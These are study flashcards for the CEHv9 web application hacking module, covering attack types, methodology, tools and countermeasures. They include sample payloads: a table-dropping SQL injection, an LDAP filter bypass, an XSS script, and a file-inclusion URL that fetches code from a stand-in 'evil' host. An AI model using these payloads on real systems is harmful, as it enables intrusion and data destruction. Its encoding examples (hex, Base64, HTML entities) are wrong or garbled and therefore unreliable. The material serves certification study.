CEHv9 MOD12 Hacking Web Applications
Web services vulns: security layer
( WS-security ) -> Parameter tampering, WSDL probing, SQL/LDAP/XPATH/OS command injection, malware injection, brute-forcing, data type mismatch, content spoofing, session tampering, format string, information leakage
Web services vulns: presentation layer
( XML, AJAX, Portal, Other ) -> Parameter tampering, WSDL probing, SQL/LDAP/XPATH/OS command injection, malware injection, brute-force, data type mismatch, content spoofing, session tampering, format string, information leakage
Web services vulns: transport layer
(HTTP, HTTPS, JMS, Other) -> Sniffing, snooping, WS-Routing, Replay attacks, DoS
Web services vulns: access layer
(SOAP, REST) -> Buffer overflow, XML parsing, spoiling schema, complex or recurisve payload, DoS, large payload
Web services vulns: discovery layer
(UDDI, WSDL) -> Fault code leaks, permission and access attacks, error leakage, authentication and certification attacks.
Web app security tools
- Acunetix web vulnerability scanner - Watcher Web Security tool - Netsparker - N-stalker web app security scanner - VampireScan - dotfender (WAF) - serverDefender VP (WAF)
Injection flaws
- Allow untrusted data to be interpreted and executed as part of a command or query - These flaws are prevalent in legacy code such as SQL, LDAP, and XPATH queries. Example of injection attacks: --SQL --Command --LDAP
Connection Pool DoS
- Attacker examines the connection polling settings of the application, constructs a large malicious SQL query, and runs multiple queries simultaneously to consume all connections in the connection pool, causing database queries to fail for legitimate users.
Web services probing attacks
- Attacker traps WSDL document - Creates a set of valid requests - Attacker uses these requests to include malcious content in SOAP requests and analyzes errors to gain a deeper understanding of potential security weaknesses
Web services XML poisoning
- Attackers inject malicious XML codes in SOAP requests to perform XML node manipulation or XML schema poisoning in order to generate errors - Attackers can manipulate XML external entity references that lead to arbitrary file or TCP connection openings and can be exploited for other web service attacks -XML poisoning enables attackers to cause DoS attacks and compromise confidential information
CAPTCHA Attacks
- Breaching client-side trust - Manipulating server-side implementation - Attacking the captcha image
Web app attack countermeasures: security misconfiguration
- Configure all security mechanisms and turn off all unused devices - Setup roles, permissions, and accounts and disable all default accounts or change their default passwords - Scan for latest security vulnerabilities and apply the latest security patches
Web Application threats 1
- Cookie poisoning - Insecure storage - Information leakage - Improper error handling - Broken account management - Directory traversal - SQL Injection - Parameter/form tampering - DoS - Buffer overflow - Log tampering - Unvalidated input - XSS - CRSF - Security misconfiguration - Broken session management
Web app attack countermeasures: directory traversal
- Define access rights to the protected areas of the website - Apply checks/hot fixes that prevent the exploitation of the vulnerability such as Unicode to affect the directory traversal - Apply security patches to server
Detecting web app firewalls and proxies on target site
- Detecting proxies can be done by seeing if any certain headers have been added in the response header field - Use TRACE method of HTTP/1.1 to ID changes to the proxy server -Detecting web app firewall, check cookies response of your request, most WAFs add their own cookie in the response
Web app attack countermeasures: cookie/session poisoning
- Do not store plain text or weakly encrypted password in a cookie - Implement cookie's timeout - Cookie's authentication credentials should be associated with an IP - Make logout functions available
Web app pen testing
- Done to identify, analyze, and report vulnerabilities. - Involves: -- ID of ports -- Verification of vulnerabilities -- Remediation of vulnerabilities
Security misconfiguration of web server
- Easy exploitation - Common prevalence - An example is when an attacker discovers a standard admin page.
Analyze web app: ID server-side functionality
- Examine page source and URLS to make an educated guess to determine the internal structure and functionality of web applications Tools used: GNU Wget, Teleport Pro, BlackWidow
Cookie exploitation: cookie posioning
- If cookie contains password or session identifiers an attacker can steal the cookie using techniques such as script injection and evasesdropping - Attackers then replay the cookie with the same or altered passwords or session IDs to bypass web app authentication - Attackers can trap cookies using ZAP, Burp Suit
Web app attack countermeasures: insufficent transport layer protection
- Non SSL pages should be redirected to the SSL page - Set the 'secure' flag on all sensitive cookies - Configure SSL provider to support only strong algorithms - Ensure certificate is valid and not expired - Backend and other connections should use SSL or other encryption technologies
Overall how to defend against web app attacks
- Perform input validation - Use WAF/IDS - Keep patches on server current - Analyze the source code for SQL injection - Grant least privileges to accounts accessing data - Perform dynamic testing and source code analysis - Disable verbose loggin
Web app attack countermeasures: LDAP injection attacks
- Perform type, pattern, and domain value validation on all input data - Make LDAP filter as specific as possible - Validate and restrict the amount of data returned to the user - Implement tight access control on the data in the LDAP directory - Perform dynamic testing and source code analysis
Web application threats 2
- Platform exploits - Insecure direct object references - Insufficent transport layer protection - Failure to restrict URL access - Insecure crytographic storage - Cookie snooping - Obfuscation application - DMZ protocol attacks - Security management exploits - Authentication hijacking - Network access attacks - Hidden manipulation - Unvalidated redirects and forwards - Session fixation attack - CAPTCHA attacks
Auth attack: HTTP request tampering
- Query string tampering -- Looking at the address bar in a browser to identify the string parameter to bypass - HTTP headers -- Attackers can modify the referer header to access protected application functionalities
Session management attack
- Session token generation -- Use session token prediction -- Use session token tampering - Session tokens handling -- MITM attack -- Session replay -- Session hijacking
Web app attack countermeasures: file injection attacks
- Strongly validate user input - Consider implementing a chroot jail - PHP: disable allow_url_fopen and allow_url_include in php.ini - PHP: ensure that all file and streams functions (stream_*) are carefully vetted
Footprint web server: server discovery
- Use whois lookup (IP of web servers) - DNS interrogation (location and type of servers) -Port scanning (find service that exists on server) nmap, netscan tools pro, advanced port scanner, hping
DoS Web Attack Examples
- User-registration DoS - Login attacks - User enumeration - Account lock out attacks
How to defend against XSS attacks
- Validate all headers, cookies, query strings, form fields, and hidden fields (i.e. all parameters) against a rigorous specification - Use a web application firewall to block the execution of malicious scripts - Encode input and output and filter Metacharacters in the input - Filtering script output can also defeat XSS vulnerabilities by preventing them from being transmitted to users - Use testing tools extensively during the design phase to eliminate such XSS holes in the application before it goes into use - Convert all non-alphanumeric characters to HTML character entities before displaying the user input in search engines and forums - Do not always trust websites that use HTTPS when it comes to XSS - Develop some standard or signing scripts with private and public keys that actually check to ascertain that the script introduced is really authenticated
Webapp Injection attacks/ input validation attacks
- Web scripts injection - OS Commands injection - SMTP injection - SQL injection - LDAP injection - XPath injection - Buffer overflow - Canonicalization
Attacks that can be conducted against Web App Client
- XSS - Redirection - HTTP header injection - CSRF attack - Session fixation - Privacy attacks - ActiveX attacks
XSS Examples
-Malicious script execution -Redirecting to a malicious server -Exploiting user privileges -Ads in hidden IFRAMES and pop-ups -Data manipulation -Session hijacking -Brute force password cracking -Data theft -Intranet probing -Key logging and remote monitoring
SQL Injection attacks
-Uses a series of malicious SQL queries to directly manipulate the database. -Bypasses normal security measures -Can be executed from the address bar --Example: " test') ;DROP TABLE messages;--
Guidelines for secure CAPTCHA implementation
1 - Client shouldn't have direct access to CAPTCHA solution 2 - No CAPTCHA reuse 3 - Use a well-established CAPTCHA implementation 4 - Warp individual letters 5 - Include random letters 6 - Encrypt all communications 7 - Use multiple fonts inside a CAPTCHA
How to defend against web services attack
1 - Configure WSDL access control permissions 2 - Use document-centric authentication credentials that use SAML 3 - Use multiple security credentials such as X.509 cert, SAML assertions, and WS-Security 4 - Deploy web services with capable firewalls 5 - Configure firewalls/IDS systems 6 - Configure firewalls/IDS systems to filter improper SOAP and XML syntax 7 - Implement centralized inline requests and responses 8 - Block external references 9 - Maintain and update a secure repository of XML schemas
How to defend against DoS attack
1 - Configure the firewall to deny external ICMP traffic access 2 - Secure remote admin and connectivity testing 3 - Prevent use of unnecessary functions such as gets, strcpy, and return addresses from overwritten 4 - Prevent the sensitive information from overwriting 5 - Perform thorough input validation 6 - Data processed by the attacker should be stopped from being executed
Web App Hacking Methodology
1 - Footprint web infrastructure 2 - Attack web servers 3 - Analyze web applications 4 - Attack authentication mechanism 5 - Attack authorization schemes 6 - Attack session management mechanism 7 - Perform injection attacks 8 - Attack data connectivity 9 - Attack web app client 10 - Attack web services
How to defend against SQL injection attacks
1 - Limit length of user input 2 - Use custom error messages 3 - Monitor DB traffic using an IDS, WAF 4 - Disable commands like xp_cmdshell 5 - Isolate database server and web server 6 - Always use method attribute set to POST and low privileged account for DB connection 7 - Run database service account with minimal rights 8 - Move extended stored procedures to an isolated server 9 - Use typesafe variables or functions such as IsNumeric() to ensure typesafety 10 - Validate and sanitize user inputs passed to the database
Hacking web servers
1 - Scan server for known vulnerabilities 2 - Launch web server attack 3 - Launch DoS against web server Common tools used: - URLScan - Nikto (!!!!!) - Nessus - Acunetix Web Vulnerability - WebInspect
How to defend against command injection flaws
1- Perform input validation 2-Escape dangerous characters 3-Use language-specific libraries that avoid problems due to shell commands 4-Perform input and output encoding 5-Use a safe API which avoids the use of the interpreter entirely 6-Structure requests so that all supplied parameters are treated as data, rather than potentially executable content 7-Use parameterized SQL queries 8- Use modular shell disassociation from kernel
Footprint web server: service discovery
1- Scan target web server for common ports 2- Tools to use: nmap, netscan tools pro, sandcat browser 3- Identified services act as attack paths for web application hacking
Session attacks: Session ID Prediction/Brute-forcing
1-Collect some valid session ID values by sniffing traffic 2-Analyze captured session IDs 3-Guess valid session IDs 4-Test different values of session ID
Analyze web app: ID server-side technologies
1-Perform detailed server fingerprinting 2-Examine URLs 3-Examine the error pages 4-Examine session tokens
Unicode encoding
16-bit = " %u2215" UTF-8 - variable length encoding "%c2%a9" = (copyright symbol)
Typical HTTP Services
80- WWW standard 81- Alternate WWW 88- Kerberos 443- SSL (HTTPS) 900-IBM Websphere admin client 2301-Compaq Insight manager 2381-Compaq insight manager over SSL 4242-Micrsoft application center remote management 7001-BEA Weblogic 7002-BEA weblogic over SSL 8000-Alternate web server, or web cache 8001-Alternate web server or management 8005-Apache tomcat 9090-Sun java web server admin module 10000-Netscape admin interface
What are web 2.0 applications?
A generation of web applications that provide an infrastructure for more dynamic user participation, social interaction, and collaboration.
Parameter/form tampering
A manipulation of parameters exchanged between client and server such as in the URL.
Directory traversal
Allows attackers to access restricted directories including application source code, configuration, critical system files, and commands outside the root directory.
Web applications provide
An interface between end users and web servers. They are vulnerable to attacks such as SQL injection, cross-site scripting, session hijacking, etc...
Web services attacks
Any web service based on XML services such as WSDL, UDDI, SOAP are vulnerable to many web threats.
Command injection attacks: HTML embeddding
Attack used to deface websites using HTML code.
Web services SOAP injection
Attacker injects malicious strings in the user input field to bypass web services authentication mechanism to access back-end databases.
Auth attack: Cookie Parameter Tampering
Attacker traps cookies set by the web application, tampers with its parameters using tools, such as ZAP and replay to the application.
Web app hacking: attack authentication mechanism
Attackers can exploit design and implementation flaws in web apps, such as failure to check password strength or insecure transportation of credentials, to bypass auth credentials: Username enumeration - Verbose failure messages - Predictable user names Cookie exploitation - Cookie poisoning - Cookie sniffing - Cookie replay Session attacks - Session predicition - Session brute-forcing - Session posioning Password attacks - Password functionality exploits - Password guessing - Brute-force attack
Web services footprinting attack
Attackers footprint a web app to get UDDI information such as businessEntity, business Service, bindingTemplate, and tModel.
Web services XML injection
Attackers inject XML data and tags into user fields to manipulate XML schema or populate XML databases with bogus entries. Can be used to bypass authorization, escalate privileges, and generate web services DoS attacks.
Broken authentication and session management
Attackers uses vulnerabilities in the authentication or session management functions such as exposed accounts, session IDs, logout, password management, timeouts, remember me,secret question, account update, and others to impersonate users. Examples: - Session ID in URL - Password exploitation (passwords not encrypted) - Timeout exploitation (timeout not set properly)
Footprint web infrastructure: server ID/banner grabbing
Banner grabbing: (HTTP)telnet <website url> 80 (HTTPS)s_client -host <target website> -port 443 GET /HTTP/1.0 Banner grabbing tools: Telnet, Netcat, ID Serve, Netcraft
Web app pen testing framework
Browser Exploitation Framework (BeEF) PowerSploit
Password crackers to use for web apps
Burp suite, Brutus, SensePost Crowbar
Footprinting web infrastructure: hidden content discovery
Content not reachable from main visible content but still there. -- Web spidering(OWASP ZAP, Burp Suit, WebScarab, Mozenda Web Agent Builder) --Attacker-directed spidering (done by intercepting proxy parses) --Brute forcing (Burp suite)
Cookie/session poisoning
Cookies are used to maintain session state in the otherwise stateless HTTP protocol. Attacker can modify the cookie content, inject the malicious content, and rewrite session data.
Command injection attacks: Shell injection
Crafts an input string to gain shell access, functions include: system(), StartProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start()
Attacking web app data connectivity
Database connectivity attacks exploit the way applications connect to the database instead of abusing database queries. Different data connectivity attacks: Connection string injection, connection string parameter pollution (CSPP) attacks, and connection pool DoS.
Analyze Web Apps
Done to ID the attack surfaces that it exposes: - ID entry points for user input (review generated HTTP requests) - ID server-side functionality (observe the apps revealed to the client) - ID server-side technologies (use HTTP fingerprinting) - Map the attack surface ( ID various attack surfaces uncovered by the applications )
Analyze web apps: ID entry points for user input
Examine URL, HTTP header, query string parameters, POST data, and cookies to determine all user input fields. Identify HTTP header parameters that can be processed by the application as user inputs such as user-agent, referer, accept, accept-language, and host headers. Determine URL encoding techniques and other encryption measures implemented to secure the web traffic such as SSL. Tools to use (Burpe suite, HttPrint, WebScarab, OWASP Zap)
Command injection attack: file injection
Example: http://partyforever.com/vuln.php?color=http://evil/exploit?
Web app DoS attack
Exhausts a server's resources by sending hundreds of resource-intensive requests. Application level DoS may be more likely to bypass a firewall. Why are applications vulnerable? - Reasonable use of expectations - Application environment bottlenecks - Implementation flaws - Poor data validation
Cross-site scripting attacks
Exploits vulnerabilities in dynamically generated web pages. Occurs when invalidated input data is included in dynamic content that is sent to a user's web browser for rendering. Attacker can inject malicious javascript, VBscript, ActiveX, HTML, or Flash for execution on a victim's system by hiding it within legitimate requests.
Cross-site request forgery (CSRF) attack
Exploits web page vulnerabilities that allow an attacker to force an unsuspecting user's browser to send malicious requests they did not intend. This attack begins when a victim user holds an active session with a trusted site and simultaneously visits a malicious site, which injects the HTTP request for the trusted site into the victim's users' session, compromising its integrity.
Improper error handling
Gives insight into source code such as logic flaws, default accounts, etc. Using the information received from an error message, an attacker identifies vulnerabilities for launching various web app attacks. Information potentially gathered: - Null pointer exceptions - System call failure - Database unavailable - Network timeout - Database information - Web application logical flow - Application environment
Hex encoding
Hello = A125C458D8
Footprint web infrastructure step 1
Helps attackers select victims and ID vulnerable web applications. - Server discovery - Service discovery - Server identification - Hidden content discovery
Connection string parameter pollution (CSPP) attacks
In CSPP attacks, attackers overwrite parameter values in the connection string: - Hash stealing (rogue server see windows password hashes when clients attempt to connect) - Port scanning (attacker tries to connect to different ports by changing value and seeing the error messages obtained) - Hijacking web credentials
Session fixation web attack
In a session fixation attack, the attacker tricks the user to access a genuine web server using an explicit session ID value. Attacker assumes the identity of the victim and exploits his credentials at the server. Can be done through email link
Vulnerability Stack
Layer 7 - Custom Web Applications - Business logic flaws, technical vulnerabilities Layer 6 - 3RD Party components - Open source / commercial Layer 5 - Database - Oracle / MySQL / MS SQL Layer 4 - Web Server - Apache / Microsoft IIS Layer 3 - Operating System - Windows / Linux / OS X Layer 2 - Network - Router / Switch Layer 1 - Security - IPS / IDS
Buffer overflow web app attack
Occurs when an application writes more data to a block of memory or buffer than the buffer is allocated to hold. Enables an attacker to modify the target protocol's address space in order to control process execution, crash the process, and modify internal variables. Attackers modify function pointers to direct program execution through a jump or call instructions and points it to a location in the memory containing malicious code.
Web services Parsing attacks
Parsing attacks exploit vulnerabilities and weaknesses in the processing capabilities of the XML parser to create a DoS attack or generate logical errors in web service request processing. - Recursive payloads: Uses infinite processing loops to exhaust resources - Oversize payloads: Send a payload that is excessively large to consume all system resources
Insecure cryptograhic storage
Refers to when an application uses poorly written encryption code to securely encrypt and store sensitive data in the database.
How does LDAP injection work?
Similar to a SQL injection attack but exploits user parameters to generate LDAP query. Example: " juggyboy)(&)) " in the username field with anything in the password field makes the statement true.
SOAP
Simple object access protocol - a protocol specification for exchanging structured information in the implementation of web services in computer networks.UDDI
Web service attack tools
SoapUI, XMLSpy, Burp Suite professional, CookieDigger, WebScarab
Insufficient transport layer protection
Supports weak algorithms, and uses expired or invalid certificates. Underprivileged SSL setup can also help the attacker to launch phishing and MITM attacks. This vulnerability exposes user's data to untrusted 3rd parties and can to account theft.
Analyze web app: Map the attack surface
Take information and map it to an attack. Example: Info: Login vulnerable Attack: Username enumeration, password brute-force
Connection string injection attack
The attacker injects parameters in a connection string by appending them with the semicolon (;) character. Before injection: " Data Source = Server, Port; Password=pwd;" after: " Data Source = Server, Port; Password=pwd; Encryption = off"
UDDI
Universal Description, Discovery, and Integration, is an XML-based registry for businesses to lust themselves on the internet.
Web app attack countermeasures 1 -4
Unvalidated redirects and forwards - Avoid using redirects and forwards - Ensure supplied values are valid Broken authentication and session management - Use SSl - Verify user ID and credentials are stored in hash form - Never submit session data as part of GET, POST Insecure cryptographic storage - Don't create or use weak cryptographic algorithms - Generate encryption keys offline - Ensure data isn't easily decrypted CSRF - Clear web history and log off immediately when done - Don't allow browser to save login details - Check HTTP referrer header
Unvalidated redirects and forwards
Unvalidated redirects enable attackers to install malware or trick victims into disclosing passwords or other sensitive information, whereas unsafe forwards may allow access control bypass. Example: http://vulnweb.com/evil.jsp?fwd=admin.jsp (shouldn't work because user isn't logged in as admin)
Different web service encoding schemes
Use many different encoding schemes to safely handle unusual characters and binary data. Url types (convert URL into ASCII format): -- "%" followed by character's two digit ASCII code --- %3d = --- %0a new line --- %20 space HTML encoding (represents unusual characters): --- & & --- < < --- > >
What is LDAP injection?
Used to take advantage of non-validated web application input vulnerabilities to pass LDAP filters used for searching directory services to obtain direct access to databases behind an LDAP tree.
WSDL
Web services definition language - for describing the connection web points XML.
Attacking web services
Web services work atop the legacy web applications.
Hidden field manipulation attack
When a user makes a selection on an HTML page the selection is typically stored as an HTTP request (GET or POST). Attackers can examine the HTML code of the page for the hidden values in order to change the post requests to the server.
Authorization attack
When attackers manipulate the HTTP requests to subvert the application authorization schemes by modifying input fields that relate to user ID, user name, access group, cost, filenames, file identifiers, etc. Attackers first access web applications using low privilege account and then escalate privileges to access protected resources.
Unvalidated input
When input from a client is not validated before being processed by web applications and backend servers.
Base64 encoding
cake = 011000110... BAse64 = 011000 110
XSS Website URL example
http://juggyboy.com/<script>alert("WARNING: This is a bad script!");</script>